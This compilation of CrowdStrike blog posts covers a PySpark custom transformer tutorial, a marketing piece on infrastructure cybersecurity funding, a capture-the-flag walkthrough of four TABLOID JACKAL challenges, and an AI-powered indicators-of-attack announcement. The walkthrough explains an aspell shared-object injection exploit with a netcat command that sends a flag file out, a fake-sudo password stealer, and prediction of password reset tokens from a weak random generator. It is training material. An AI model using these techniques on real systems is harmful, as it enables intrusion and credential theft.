        return self.getOrDefault(self.append_str)
  
    def _transform(self, dataset):
        """
        This is the main member function which applies the transform to transform data from the `inputCol` to the `outputCol`
        """
        if not self.isSet("inputCol"):
            raise ValueError(
                "No input column set for the "
                "StringAppenderTransformer transformer."
            )
        input_column = dataset[self.getInputCol()]
        output_column = self.getOutputCol()
        append_str = self.getAppendStr()
        udf_func = lambda x: append_string(x, append_str)
        data_type = StringType()
         
        return dataset.withColumn(output_column,
                                  udf(udf_func, data_type)(input_column))

Let’s break down some components of this wrapper and discuss each in detail:

  • Transformer Abstract Base Class
  • Param Type Member Variables
  • @keyword_only, Constructor, and Decorator and Input Persistence
  • Mixins: HasInputCol, HasOutputCol
  • Traits: DefaultParamsReadable, DefaultParamsWritable

Transformer Abstract Base Class

Every custom transformer must at least inherit pyspark.ml.Transformer as the abstract base class.

We must also at the minimum override the _transform() function so that the Transformer knows how to transform out data. The input passed to  _transform() is the entire input Dataset including all the columns so we will need to retrieve the input and output columns (usually set by the constructor).

Now that we have the input dataset , input_column  name, and output_column  name, we can wrap our transformation function append_string(). Note that if the transformation function requires more than a single input, you will need to convert the function into one which accepts a single input. You can do this using a lambda function.

# Code snippet of _transform():
        udf_func = lambda x: append_string(x, append_str)  # append_string() takes two inputs, we can wrap it with a lambda
        data_type = StringType()
         
        # Note we need to wrap udf_func with pyspark.sql.functions.udf
        return dataset.withColumn(output_column,
                                  udf(udf_func, data_type)(input_column))

Param Type Member Variables

As part of constructing the custom transformer, we will need to generate pyspark.ml.param.shared.Param objects for each of the following:

  • an input_column name which indicates the data that should be transformed
  • the output_column  where the transformed data should be written.
  • any additional data that need to be stored by the Transformer (e.g., append_str, the string that in we want to append in our example)

Param  objects can be set to a value like normal variables but enable us to more easily read/and write them to/from file using Spark’s native methods. Generally these can be set at initialization with the constructor (__init__()). However, because we inherit from HasInputCol and HasOutputCol, the Param type member variables inputCol and outputCol respectively are created automatically for us. Thus we only need to create the append_str Param object. See the next section for more information on the mixins.

append_str = Param(
        Params._dummy(),
        "append_str",
        "Value we want to append with",
        typeConverter=TypeConverters.toString,   # This will allow code to automatically try to convert to string
    )

The typeConverter parameter here helps implicitly apply type conversions if the data type is different.

Mixins: HasInputCol, HasOutputCol

Inheriting mixins HasInputCol and HasOutputCol allow us to reduce the amount of boiler plate code we must write to create. HasInputCol will create a Param member variable for your custom transformer class called inputCol  that can then be set/retrieved/written to file. Same effect for HasOutputCol and the member variable outputCol. Additionally each mixin here will also initialize default values for their member variable.

Optionally, you can implement setInputCol()  and setOutputCol() to conform more closely with standard transformers available in SparkML.

There are also additional mixins that can be inherited if needed (e.g., a list of input columns or output columns). For more information, please refer to the pyspark API.

@keyword_only Decorator, Constructor and Input Persistence

To correctly create a custom transformer, we must be able to store the inputs used to create the transformer. The inputs will be stored as Param type member variables within our custom transformer class. Let’s break down how this is done.

@keyword_only
def __init__(self, inputCol=None, outputCol=None, append_str=None):
    """
    Constructor: set values for all Param objects
    """
    super().__init__()
    self._setDefault(append_str=None)
    kwargs = self._input_kwargs
    self.setParams(**kwargs)

Here, @keyword_only  will store input keyword arguments (inputCol, outputCol and append_str in our example) as an internal map inside of the Transformer (in a protected variable called _input_kwargs). After the input arguments are stored, we must manually set any custom variable (using _setDefault()) we pass in that isn’t part of the mixins we inherited from. Specifically, because we inherited from HasInputCol  and HasOutputCol, we do not need to manually set.  This will ensure we can safely retrieve the variables later using the inherited member function getOrDefault().  

Next we set the Param type member variables (by calling setParams()) using our map _input_kwargs so that we can correctly retrieve the true assigned values when we need them later. 

Finally, when we decide to retrieve the variables such as inputCol or append_str , we will need to make a call to getOrDefault() like self.getOrDefault(self.append_str). This is different from how we normally retrieve a variable in Python because each variable is a Param object. See definition for function getAppendStr() for more detail.

Traits: DefaultParamsReadable, DefaultParamsWritable

The final component of creating a custom transformer is to inherit traits DefaultParamsReadable and DefaultParamsWritable to allow us to correctly read to file and write from file both as part of a pipeline or by itself. These traits will read/write the Params we have created to file.

Not inheriting these traits may lead to errors like the following when attempting to save a customer transformer:

ValueError: ('Pipeline write will fail on this pipeline because stage %s of type %s is not MLWritable', 'StringAppender_281f47e48529', <class '__main__.StringAppender'>)

Using a Custom Transformer as Part of a Pipeline

Once the custom transformer is built, it’s easy to attach the transformer to add this component to a pipeline. We will need to initialize our custom transformer by setting the correct input/output columns and the append string to use. Then we will add it as a stage to our pipeline. For example, if we extend the pipeline from section “Pipeline Framework” above, we will have:

from pyspark.ml import Pipeline
from pyspark.ml.classification import LogisticRegression
from pyspark.ml.feature import HashingTF, Tokenizer
from custom_transformer import StringAppender  # This is the StringAppender we created above
 
appender = StringAppender(inputCol="text", outputCol="updated_text", append_str=" hadoop")  # initialize our custom transformer
tokenizer = Tokenizer(inputCol="text", outputCol="words")
hashingTF = HashingTF(inputCol=tokenizer.getOutputCol(), outputCol="features")
lr = LogisticRegression(maxIter=10, regParam=0.001)
pipeline = Pipeline(stages=[appender,   # add the transformer as a stage
                            tokenizer,
                            hashingTF,
                            lr])

As we can see, converting a custom processing function into a custom transformer step requires us to implement the pattern discussed in this post. Although there are some non-trivial components to wrapping functions, the pattern for this work is consistent so it can be applied to most processing functions. Additionally, custom transformers can then be used as part of a pipeline to further improve code readability and integration with native spark pipeline frameworks. Finally, setting up your processing functions as transformers allows us to save entire pipelines to disk, which can be more easily shared and used by collaborators down-stream of your workflow.

References

Additional Resources

  • Learn more about today’s adversaries and how to combat them at Fal.Con 2022, the cybersecurity industry’s most anticipated annual event. Register now and meet us in Las Vegas, Sept. 19-21! 
  • Learn more about the powerful, cloud-native CrowdStrike Falcon® platform by visiting the product webpage.
  • Get a full-featured free trial of CrowdStrike Falcon Prevent™ and learn how true next-gen AV performs against today’s most sophisticated threats.

Securing Our Nation: How the Infrastructure Investment and Jobs Act Delivers on Cyber Resiliency

1 August 2022 at 15:21

Attacks and intrusions on our nation’s vital infrastructure — our electrical grid, water systems, ports and oil supply — are on the rise. For example, as reported by the Pew Charitable Trust in March 2021, hackers changed the chemical mixture of the water supply in Oldsmar, Fla., increasing by 100 times the level of sodium hydroxide (lye) in the water supply. In June 2021, Reuters published an article about how poor cyber hygiene, ineffective cybersecurity practices and the danger of stolen credentials impacted millions of people when a cyberattack interrupted the flow of fuel on the East Coast of the United States. As we hyperconnect our cities and communities, security must be at the forefront of every plan and design.

Recognizing the required investment in the United States, Congress passed the Infrastructure Investment and Jobs Act (IIJA) in November 2021. The IIJA authorizes roughly $1 trillion USD in funding for a number of initiatives that include improving our highways, repairing bridges, creating smart cities, studying the effects of climate change, developing new clean energy technology and both improving and hardening our electrical and water utilities.

For anyone who’s not accustomed to reading legislation, 1,000 pages of complex legislation can be intimidating. States and large cities, as well as larger businesses supporting critical infrastructure, may have entire divisions or established working groups dedicated to understanding and pursuing this and other grant programs. I can only imagine there are numerous small and medium-sized companies, as well as local and tribal governments who, like me, have little experience in taking advantage of the incredible funding opportunities in this and other grants across the federal government.

Here, I will identify some parts of the IIJA your organization may be able to take advantage of.  Whether you have people who work with federal grant funding, or not, awareness of this capability to make up for budget shortfalls while building our critical infrastructure is important.  We created an easy-to-read document that outlines cybersecurity-specific sections of the Act and the CrowdStrike solution in our “How CrowdStrike Supports the IIJA” white paper.

Key IIJA Cybersecurity Funding Provisions

Key provisions of the IIJA provide funds to federal agencies and state, local, tribal and territorial governments, as well as public and private utility and transportation entities, to implement cybersecurity solutions that promote stronger cybersecurity resilience and the ability to assess, detect, identify, mitigate and respond to cyber threats today and into the future.

In particular, the IIJA calls out the U.S. Department of Transportation (DOT), Department of Energy (DOE), Department of Homeland Security (DHS) and Environmental Protection Agency (EPA) for specified cybersecurity funding. Within these provisions, the federal government will provide $3.5 billion USD for key projects that include requirements to improve cybersecurity posture and resiliency, promote intelligence sharing and respond to attacks. 

DHS: Layering Our Defenses and Coordinating Our Response

The Cyber Response and Recovery Act and the new State and Local Cybersecurity Grant Program provide over $1.1 billion USD to state, local, tribal and territorial governments including public-private partnerships. These funds are available for seven and five years, respectively, and seek to address cyber risks and threats by supporting threat hunting, network protection and the replacement and modernization of tools and systems. The Cybersecurity Infrastructure Security Agency (CISA), a component agency of DHS, is tasked with defending the infrastructure of the internet and improving its resilience and security for the nation. Each organization must submit its cybersecurity plan when applying for grant funding and, in the case of the State and Local Cybersecurity Grant Program, successful applicants will receive up to 90% of required funding for the first year. 

DOT: Improving and Securing Our Roads, Bridges and Ports 

As the U.S. transportation system’s networks evolve into a hyperconnected mesh of data and information to make them more efficient, their attack surface exponentially increases. The IIJA directs two specific programs under the DOT to strengthen the cybersecurity posture of the transportation system. The Strengthening Mobility and Revolutionizing Transportation (SMART) grant provides $500 million USD over five years to state, local and tribal governments, and public toll authority and metropolitan planning agencies, to ensure the security of smart cities by implementing cybersecurity best practices. The second program, Advanced Research Projects Agency-Infrastructure (ARPA-I), provides unspecified funding for the advancement of cybersecurity technology solutions that promote the resiliency of roads, highways, bridges, airports, seaports and railways against cyberattacks.

DOE: Keeping the Lights On

The resiliency of the U.S. electrical and power system is critical to national security. Recent years have shown how delicate the grid is, and our adversaries have demonstrated they are adept at attacking power grids. Seven programs provide over $1 billion USD in investment funding to secure research, modernization and resiliency in the energy sector and electrical grid. These projects include maturity models and threat assessments, protection, detection, response and recovery from cyber threats to pilot projects to gain experience with new cyber technology. Each of these provides state, local, tribal and territorial governments, as well as public and private electrical utility companies, with the ability to harden and improve their network defenses, expand cyber defense capabilities and capacity, and gain a clear understanding of their environment and the efficacy of their cybersecurity plans. 

EPA: Ensuring Our Drinking Water Is Safe and Sewers Keep Flowing 

With two programs valued at $375 million USD over five years, the EPA’s Midsize and Large Drinking Water System Infrastructure Resilience and Sustainability Program, and the Clean Water Infrastructure Resiliency and Sustainability Program, seek to improve the resiliency of the nation’s water system. This section of the IIJA directs public and private water providers and state and local governments to develop and implement projects that reduce the cybersecurity vulnerabilities of water systems in communities across the United States. 

The CrowdStrike Mission: We Stop Breaches

The integrated CrowdStrike security platform provides governments and organizations with the optimal solution to protect and defend their environments while taking advantage of IIJA funding. We offer endpoint protection capabilities plus a 24/7/365 managed services offering designed to augment teams that may not be staffed to support immediate response — solution attributes that are specifically mentioned in numerous sections of the IIJA. And with over a decade of proven performance in preventing breaches and ensuring resiliency of small, medium and large corporations and governments worldwide, CrowdStrike is the clear choice for securing our critical infrastructure and your valuable data during a cyberattack or intrusion.

In addition, CrowdStrike has a robust team of threat advisors and intelligence experts ensure the rapid flow of threat and adversary contextual information, increasing the strategic impact of information across your environment. Recognizing that 80% of attacks in 2021 were identity-based, CrowdStrike now offers the industry’s first fully managed identity threat protection solution delivering identity threat prevention and IT policy enforcement so that IT and security teams can sleep better at night.  In many cases the adversary manages to bypass standard security measures using valid, stolen credentials. Organizations are now demanding these integrated capabilities where services are delivered through a single, lightweight sensor implemented in on-premises, hybrid and cloud environments.  Ultimately there is a need to provide immediate protection, decreasing risk while allowing clients to focus on providing their core services and products.

The CrowdStrike Falcon® platform provides an increasingly expansive ecosystem of protection capabilities, from endpoint and cloud security, to threat intelligence, identity protection and IT operations. CrowdStrike’s open ecosystem and growing list of industry-leading partnerships enhances and extends our powerful protection across critical areas like operational technology (OT), Internet of Things (IoT) network security and more, empowering forward-leaning organizations to take advantage of the funding in the IIJA. Our integrated Falcon platform capabilities and extended security ecosystem accessible via the CrowdStrike Store provide answers to the challenges and gaps outlined in the IIJA.

Are you interested in learning more about how CrowdStrike can assist you in your journey and help get the funding you need? Now is the time to take advantage of this opportunity. Adversaries will not wait — and neither should you. Whether you provide electricity to local communities, are responsible for designing and building our nation’s bridges and roads, or serve our citizens in local, state or tribal governments, we are here to help. Schedule a meeting with one of our professionals to learn more about how we can help you harden your network and improve your cyber resiliency.

Additional Resources

Adversary Quest 2022 Walkthrough, Part 2: Four TABLOID JACKAL Challenges

In July 2022, the CrowdStrike Intelligence Advanced Research Team hosted the second edition of our Adversary Quest. As in the previous year, this “capture the flag” event featured 12 information security challenges in three different tracks: eCrime, Hacktivism and Targeted Intrusion. In each track, four consecutive challenges awaited the players, requiring different skills, including reverse engineering, vulnerability analysis and exploitation, and cryptanalysis.

Part 1 of this blog series described our intended approach to solving the challenges of the eCrime track. In this Part 2 blog post, we describe our intended approach to solving the challenges of the Hacktivism track. In this track the players were asked to analyze activities by TABLOID JACKAL. The objective of this actor was described as follows:

The activities of SPACE JACKAL last year have not gone unnoticed, and one of their nemesis has decided to respond. Now, researchers are tracking a new activity cluster, which is very likely to belong to a group called TABLOID JACKAL. This actor is known to spread fake news with the intention of convincing people to use TABs rather than spaces as indentation characters. We were approached by “Daily Code”, a newspaper agency that is known for reports on algorithms, software architecture and coding styles, to analyze recent activities of TABLOID JACKAL on their network.

Challenge #1: “display0”

We were approached by our customer “Daily Code” who detected suspicious activity on a VPN gateway. One of their sysadmins did some basic inspection of the system and was able to discover an unknown ELF binary.

For further analysis, the sysadmin sent us the ELF alongside an asciinema recording of their terminal session.

For this challenge, we were given two different files:

  • display0: An x64 ELF binary
  • challenge.cast: An asciicast recording file

As outlined in the description, the asciicast recording was created by a sysadmin, who discovered a suspicious ELF binary on a system. It contains a log of the admin’s shell interactions during the investigation.

The recording can be replayed by using the asciinema shell client as follows:

$ asciinema play challenge.cast

The following listing shows an excerpt of the recording:

(Click to enlarge)

As we can see, the admin first executed a number of commands to gather general information about the system, such as the running processes, configured network interfaces and more. At the end of the session, a hidden file named .display0 is discovered in the directory /tmp/.Xorg. The sha256 command seen in the end of the session allows us to confirm that the binary we were given alongside the recording is identical.

Using strace, we can get a first overview of what the binary actually does when executed:

As can be seen in the output, one of the first actions is to mmap the public part of the ssh host keys as readable. Afterwards, the binary uses an AF_NETLINK socket to retrieve information about the system’s network interfaces (output shortened):

(Click to enlarge)

Next, the content of the files

  • /proc/cpuinfo
  • /proc/meminfo
  • /etc/fstab

Are read (or mmap’ed) and finally the uname syscall is executed:

At the end a memory file descriptor is created via memfd_create and 510168 bytes are written to it. That file descriptor is then passed to execve by using the corresponding path in the /proc file system:

(Click to enlarge)

The combination of memfd_create and execve is a fairly well-known technique in Linux to execute an in-memory ELF. However, executing the binary locally does not appear to succeed on our analysis machine. The call to execve returns with an Exec format error, indicating that an invalid executable was given.

The fact that a number of system properties were gathered before the execve call leads to the assumption that there is some kind of dependency between these properties and the resulting binary passed to execve.

Using findcrypt-yara (or similar tools), we can quickly assess that the binary contains constants that are used for SHA256 hashing and AES encryption:

This further strengthens the earlier assumption that the system properties could be used in some form to decode/decrypt an embedded binary: A SHA256 digest might be used to derive a key for an AES-based decryption routine. For further analysis, IDA was used to disassemble and decompile the binary.

After some reversing, it becomes clear that the gathered information is used to create a SHA256 digest, of which the first 16 bytes are used as a key for AES128 in counter mode. The following sequence gives a rough outline of the information used to derive the key:

  • SSH host keys (public, addr 0x173)
  • Network interfaces (IPv4 / IPv6 / MAC, addr: 0x18db)
  • /proc/cpuinfo (model name and flags, addr: 0x191)
  • /proc/meminfo (MemTotal, addr: 0x193f)
  • /etc/fstab (addr: 0x1958)
  • hostname (addr: 0x1590)

The SHA256 update function is located at 0x1ee0 while the AES128-CTR decryption routine can be found at 0x26d1.

After renaming identifiers and adding type information, we get the following main() function:

The following screenshot shows the function dynamic_key_derive(), which contains the main logic of the key derivation:

As the environment of the local test system is different from the one where the binary has been discovered, a different key is derived, leading to a wrongly decrypted embedded binary. The following Python script can be used to derive the correct key based on the values observed on the remote system:

(Click to enlarge)

Afterwards, the inner binary can be extracted and decrypted as follows:

Without further ado, we are able to extract the flag contained in the inner binary as follows:

Challenge #2: “Spellcheck”

Initial response handling of the “Daily Code” incident has turned the spotlight on a web service that was apparently exploited by TABLOID JACKAL to gain initial access to a certain laptop. This web service was believed to run locally on the laptop of the managing editor of “Daily Code”, but a quick scan of the network revealed that it was exposed to the whole internal network. Please analyze the web service – reachable at 116.202.161.100:5000 for the purpose of analysis – and help us to identify the vulnerability.

A tar file was given for the second challenge of the TABLOID JACKAL track, containing a Python Flask web API that implements a wrapper around the spell checking tool aspell:

(Click to enlarge)

The directory named dicts contains some English dictionaries. The following listing shows the Python code of the API:

The code exposes the following HTTP routes that implement various functions:

  • /spellcheck (conducts spell checking with aspell)
  • /status (returns working directory and OS/version information)
  • /dicts (returns available dictionaries)
  • /dicts/update (allows to upload dictionaries, performs authentication check)

When looking closer at the /dicts/update route, it becomes clear that the password check is only conducted when sending an HTTP POST request. However, the route also supports HTTP GET, allowing us to skip authentication. Afterwards, the function checks whether a dict entry is contained in the request.files mapping, which Flask uses to store uploaded files. If that is the case, and a filename has been provided, the new dictionary is stored inside the application’s dictionary folder. This should allow us to upload arbitrary files to the server. However, a directory traversal attack is not possible due to the use of Flask’s secure_filename() function.

Looking at the /spellcheck route, we can see that it passes a language specified as the HTTP parameter lang to aspell as a command line argument. Additionally, the data specified as the HTTP parameter text is sent to aspell’s stdin.

As a next step, aspell pipe was invoked locally in order to explore its functionality. In the most basic case, we can provide a word to its standard input, and aspell replies with a list of suggestions, as shown for helo in the following listing:

(Click to enlarge)

However, browsing the official documentation shows that aspell behaves differently in case values are provided that start with special characters.

The following list taken from the documentation gives an overview:

*word	Add a word to the personal dictionary
&word	Insert the all-lowercase version of the word in the personal dictionary
@word	Accept the word, but leave it out of the dictionary
#	Save the current personal dictionary
~	Ignored for Ispell compatibility
+	Enter TeX mode.
+mode	Enter the mode specified by mode.
-	Enter the default mode.
!	Enter terse mode
%	Exit terse mode
^	Spell-check the rest of the line

Further, the documentation mentions that the format $$command [data] allows to read and modify configuration options (among other things).

Invoking aspell dump config gives a first overview of these options (shortened):

At runtime, these values can be printed via $$cr <name>:

Similarly, values can be written by using $$cs <name>,<value>:

The ability to set configuration options opens up a large potential attack surface. For example aspell makes use of spell checking plugins (for example for TeX), which can be implemented in shared objects and might enable a route for code execution.

As seen in the earlier command overview list, the character + instructs aspell to enter TeX mode. To quickly get an overview of what happens when doing so, aspell was invoked with strace:

(Click to enlarge)

As shown in the output, entering TeX mode made aspell load the shared object tex-filter.so from the directory /usr/lib/aspell/x86_64-linux-gnu.

Now with the ability to upload arbitrary files to the dictionary folder directly and being able to manipulate configuration values at runtime, we might be able to force aspell into loading a malicious shared object.

As noted in the documentation, aspell makes use of the configuration option filter-path to look for its plugins. To quickly validate this assumption, we can alter its value and try to enter TeX mode afterwards:

As we can see, aspell actually crashed with an unhandled error, indicating that changing filter-path did indeed have an effect on its plugin loading. The obvious reasoning for that might be that there are simply no matching files stored in /tmp. To test that assumption, the system-provided TeX filter files were copied to /tmp:

Afterwards, aspell was started with strace to confirm that the copied files are loaded from that directory:

As shown in the output, the shared object is indeed loaded by aspell. Putting everything together, we should therefore be able to exploit the remote service in the same way:

  • Upload malicious tex-filter.so (and auxiliary files) to the dict directory
  • Derive absolute path of remote dict directory via /status
  • Provide input to aspell that
    • Changes filter-path to the dictionary directory
    • Enters TeX mode, triggering loading of the malicious shared object

The following files implement the outlined exploit. It can be used as follows to gain code execution and retrieve the flag from the remote host:

$ ./exploit.py http://116.202.161.100:5000 'cat /flag.txt | nc <lhost> 2323'

Makefile

tex-filter.c

exploit.py

Challenge #3: “Password”

As your investigation revealed TABLOID JACKAL gained access to the laptop of the managing editor by exploiting their spellcheck service, but that would yield only user-privileged access. This level of privilege does not carry much risk. We did get a copy of the managing editor’s home directory for you though to find out whether the threat was fully removed.

According to the challenge description we have received a folder structure where we can find a few files:

Reverse-Engineering the Implant

Loading the probably malicious binary named boltctl into Ghidra shows that the main() function (identified via the entry) is rather short and also executes a new program via execvp() via a path (first argument) that is initialized randomly also in main(). Right before this execvp() call, there is another function invoked that becomes of interest.

(Click to enlarge)

Using Ghidra, the decompilation of the function starting at position 0x00101a31 reveals a pattern that raises the expectation of some strings being encrypted: functions known for receiving a string as first argument (e.g., getenv() and puts()) receive not strings, but the return value of the function FUN_00101b61().

(Click to enlarge)

This function, named FUN_00101b61(), is invoked with two arguments — one data element and a second that is probably the length of the first. Our initial assumption is that this is a string-decryption routine, which can be confirmed by reverse engineering it:

(Click to enlarge)

String Decryption

There are various ways to obtain the clear text strings used by the program: probably the easiest way is to reimplement the function as a Python script like the following that decrypts the given strings and makes them readable:

(Click to enlarge)

Fake Sudo Behavior

Decrypting the strings reveals that the binary prints messages best known from the program sudo. For example, for a certain yet unknown condition, the message “Sorry, try again.” is printed. Also the message “[sudo] password for %s: is printed as well. The routine that prints both strings and executes some other code is started if and only if the function named FUN_00101329() returns 1.

(Click to enlarge)

Reversing this function FUN_00101329() shows that it returns 1 if four specific environment variables are set, which is the case when sudo was used to invoke the program, as can be seen in the commented listing below:

(Click to enlarge)

Overall, this makes it evident that the binary checks whether it was invoked by sudo (for example with the command $ sudo boltctl) and if so, it fakes sudo behavior, probably trying to trick the user into typing the password again into a non-sudo prompt.

Exfiltrating the User’s Password

After presenting a fake prompt, the password is handled via another function call in FUN_00101a31(). The password is passed to the function starting at position 0x0010182b. Decompiling this function using Ghidra reveals another encryption routine and a call to yet another function FUN_00101714() with an argument that is probably the generated ciphertext.

(Click to enlarge)

This decompilation shows that each character is encrypted using a round key (local_43c) and the XOR-operation. This round key is computed inside the loop, based on three parameters that are also updated for each iteration. The decompilation of this round key function FUN_00101651() is as follows:

Both decompilations are required and sufficient to write a decryption routine, later used as decrypt_payload.py:

(Click to enlarge)

Reverse-Engineering the Exfiltration Channel

The following decompilation of the function handling the encrypted password, called by the function FUN_0010182b() shown above, is generated using Ghidra:

(Click to enlarge)

This shows that the encrypted password is sent via a network socket directly using the sendto() function without any modification. The port used is 1901 and the receiver address is 0xffffffff — which is the broadcast address, also known as 255.255.255.255. In addition, SO_BROADCAST is configured using setsockopt() and the socket is a UDP socket created with socket(). Therefore it is reasonable to presume that a local insider is listening on this port, waiting for an incoming encrypted password.

Extracting the Password from EDR Logs

Luckily we were provided with a network capture file, recorded by a “sensor” running on the laptop, that contains the captured password. The captured packet can be extracted using tcpdump and then decrypted using the Python script shown above:

Challenge #4: “tokens”

After getting root, the TABLOID JACKAL explored all the accounts that exist on the laptop. They thereby found out that the editor is using a special web application (reachable at 116.202.83.208:42300) for reviewing articles in the publishing pipeline. Moreover, they observed that the editor is using the admin account for this purpose. We believe that TABLOID JACKAL  found a vulnerability in it that can be exploited to get access to the editor’s reviewer account.

A quick overview of the web interface shows that the application exposes two functionalities: Editorial Access and Mailbox Access. Both require user authentication. Moreover, it is possible to register new users and reset the password for editorial access. However, the Editorial page is empty if we use a new user to access it.

After registering a new user and testing the password reset functionality, a reset token is sent to the user’s mailbox.

Apparently, the reset token is a longer random number of at least 48 bits in length as the largest reset token observed (239660317423097) is a 48 bit number. A brute-force search of the token is therefore not viable. Additionally, experimenting with the application shows that the token is deleted after a wrong attempt as the last issued token is not working if a wrong token was given first.

Further investigation of the application shows a hint in the robots.txt.

The path /.git is excluded from indexing by search engines. A source code file is exposed in the path.

In particular, the file random_generator.py contains a definition for the class Random that implements a custom random number generator.

After doing some research of types of random number generators, we learn that the class implements a Linear Congruential Generator (LCG). Basically, new random numbers are generated by calculating a simple linear equation from several hardcoded values and a seed that is restricted to 48 bits in length (due to the AND operation using self.mask in line 12). The return value of the internal function _next() is restricted to 26 bits in line 15. The _next() function is called three times by next() which constructs the resulting random number from these three 26 bit numbers by bit shifting the return values of the latter two calls and adding them. The method next_limit() can be used to create an upper limit for the generated random number by applying a modulo operation.

The upper limit 281474976710656 in the example calls in lines 25 to 31 is 248 and therefore limits return values to 48 bits. This and that the output are decimal numbers like the reset tokens suggest that this is the random number generator used by the web application to create password reset tokens.

LCGs are not cryptographically secure, though. The security of any random number generator depends on the property that attackers cannot guess the seed given a certain number of generated numbers. While some bits of the seed are dropped from the result in this LCG, it is indeed possible to calculate the seed given a number of outputs as they are just the result of basic linear equations that can be completely solved given enough information.

Hence, it is possible to calculate future outputs, i.e., password reset tokens, of the random number generator after the current seed is calculated. 

Solution

To calculate the seed from given outputs, we first have to investigate what information about the seed remains in a generated number. 

Like stated above, the method _next() is called three times by next(). From these calls, the lowest 21 bits of the new seed after the first call remain in the final output. That is the case because the return values of the second and third call are shifted by 21 bits to 42 bits respectively and added to the return value of the first call. This can be seen in line 18 of the random_generator.py listing above.

The easiest solution therefore is to generate three random numbers using the password reset functionality, take the lowest 21 bits of the first one and search through the possible values for the remaining 27 bits via two loops. In particular, the 21 bits have to be shifted left by 22 bits as _next() shifts the seed right by 22 bits before returning the result. Therefore, the lower 22 bits of the seed are searched as well as the upper 5 bits as the seed is 48 bits long in total.

(Click to enlarge)

The seed of the class Random is set to every possible seed while fixing these lower 21 bits from the first output in line 10. After simulating the two other calls to _next() twice in the following lines, the internal seed of Random should be exactly the same as after the generation of the first random output if the correct seed was found using this search algorithm. This is verified by generating two random numbers. If these are the same as the ones generated by the password reset, we have found the correct seed and can generate the next reset tokens. This is checked in lines 14 and 19.

Now, we have to request a password reset for the admin account and can use the first reset token the search algorithm returned in order to set the password for admin to an arbitrary value. Using this password, it is possible to access the editorial page with the admin account.

Final Remarks

This concludes the CrowdStrike Intelligence Adversary Quest 2022. The TABLOID JACKAL track was about a threat actor attacking news paper agencies to spread fake news about the superiority of TAB characters for source code indentation. In the first challenge, players were asked to reverse engineer a sample that was found on a host inside the internal network of “Daily Code,” a fictional newspaper agency. This binary was used as a beachhead for attacking a service running on the laptop of the managing editor, and the second challenge was about reproducing this attack. In the third challenge players needed to analyze another binary, dropped on the laptop after exploitation, that was used to steal and exfiltrate  the password of the user on the laptop. After getting access to the laptop and gaining root access there, TABLOID JACKAL also had access to a Content Management System that is used by the Daily Code to edit and publish articles. In the final challenge, players had to reproduce a vulnerability in this Content Management System that was exploited by TABLOID JACKAL to arbitrarily edit and publish articles.

We hope you enjoyed the Adversary Quest and are now well prepared for the next one. Feel free to drop us an email at [email protected] — especially if you published a writeup, want to provide some feedback or have any questions. Also note that CrowdStrike is constantly hiring talented cybersecurity professionals!

Additional Resources

Introducing AI-Powered Indicators of Attack: Predict and Stop Threats Faster Than Ever

10 August 2022 at 07:13
  • AI-powered indicators of attack (IOAs) are the latest evolution of CrowdStrike’s industry-first IOAs, expanding protection with the combined power of cloud-native machine learning and human expertise
  • AI-powered IOAs use the speed, scale and accuracy of the cloud to rapidly detect emerging classes of threats and predict adversarial patterns, regardless of tools or malware used
  • AI-powered IOAs are now available for CrowdStrike customers, requiring no configuration and at no additional cost

CrowdStrike today unveiled the next evolution of CrowdStrike’s industry-first IOAs: artificial intelligence (AI)-powered IOAs. Available to customers immediately, AI-powered IOAs are created by cloud-native machine learning (ML) models trained on the rich telemetry of the CrowdStrike Security Cloud the engine powering the largest market share of deployed sensors in the enterprise security landscape and expertise from our elite threat hunting teams to predict and proactively protect against emerging classes of threats. This milestone extends our approach of unifying AI and human expertise (as we have done with CrowdStrike Falcon OverWatch™) to deliver unparalleled protection. 

AI-generated IOAs fortify existing defenses (see Figure 1) by using cloud-based ML and real-time threat intelligence to analyze events at runtime and dynamically issue IOAs to the sensor. The sensor then correlates the AI-generated IOAs (behavioral event data) with local events and file data to assess maliciousness. AI-powered IOAs operate asynchronously alongside existing layers of sensor defense, including sensor-based ML and existing IOAs.

Figure 1. AI-powered IOAs issued by cloud-native ML models trained on the rich telemetry of the CrowdStrike Security Cloud

Key Benefits of AI-Powered IOAs

  • Detect emerging classes of threats faster than ever: Stay one step ahead of adversaries by predicting shifting tradecraft and enabling proactive local defense that works alongside existing layers of defense. 
  • Drive automated prevention with high-fidelity detections: Cloud-native AI models share real-time IOAs with the CrowdStrike Falcon® sensor to shut down attacks, irrespective of the specific malware or tools used. 
  • Reduce false positives and improve productivity: Trained on expert acumen and activated at cloud-scale, AI-powered IOAs synthesize insights from CrowdStrike’s world-renowned threat hunting team to minimize the number of false positives security teams have to deal with. This helps maximize analyst productivity and delivers automated threat hunting expertise at scale. 

Foundation: What Are Indicators of Attack? 

An industry-first pioneered by CrowdStrike, indicators of attack (IOAs) are sequences of observed events that indicate an active or in-progress attempt to breach a system (such as code execution, persistence and lateral movement). Tracking events as a sequence allows analysts to identify how adversaries initially gain network access and then quickly infer their motivation or objectives. By tracking key execution points across an attack surface, IOAs enable analysts to paint a full picture of an attack, regardless of malware or tools used. Beyond alerting to active attacks, IOAs apply advanced behavioral analysis to model and predict adversary patterns, delivering enhanced prevention against future attacks. 

Focusing on IOAs gives customers multiple advantages over solely relying on indicators of compromise (IOCs). First, IOAs enable customers to detect attacks before or as they emerge, rather than after a system has been compromised — thus enabling a proactive and preventative defense strategy. Relying solely on IOCs puts an organization a step behind adversaries, as they alert analysts to the presence of adversaries after systems have been compromised (a reactive approach).

Figure 2. Indicators of compromise vs. CrowdStrike indicators of attack

Second, by focusing on adversarial motivations rather than specific malware or tools used, IOAs enable customers to adapt to new classes of attacks and shifting adversarial tradecraft, such as malware-free or fileless attacks, which accounted for 62% of attacks in the last year, according to the CrowdStrike 2022 Global Threat Report

Finally, because IOAs are generic in nature, they can be evaluated in parallel (enabling both computational efficiency and scalability) and don’t need to be updated as frequently as signature-based approaches (as is the case with IOCs). 

Expanding Capabilities of IOAs with AI  

Until now, the process of generating IOAs has primarily relied on the applied expertise of world-renowned threat hunters, resulting in a highly sophisticated and highly accurate indicator. To enable customers to stay ahead of tomorrow’s threats, the process of detecting and classifying active attacks needs to exceed the speed of our adversaries, without compromising on the incredible fidelity of expert-generated IOAs. To accomplish this, we’ve married human expertise with ML to expand our capacity to issue IOAs and enhance the quality of expert-generated IOAs, making detections even more comprehensive and proactive, while retaining high levels of fidelity. 

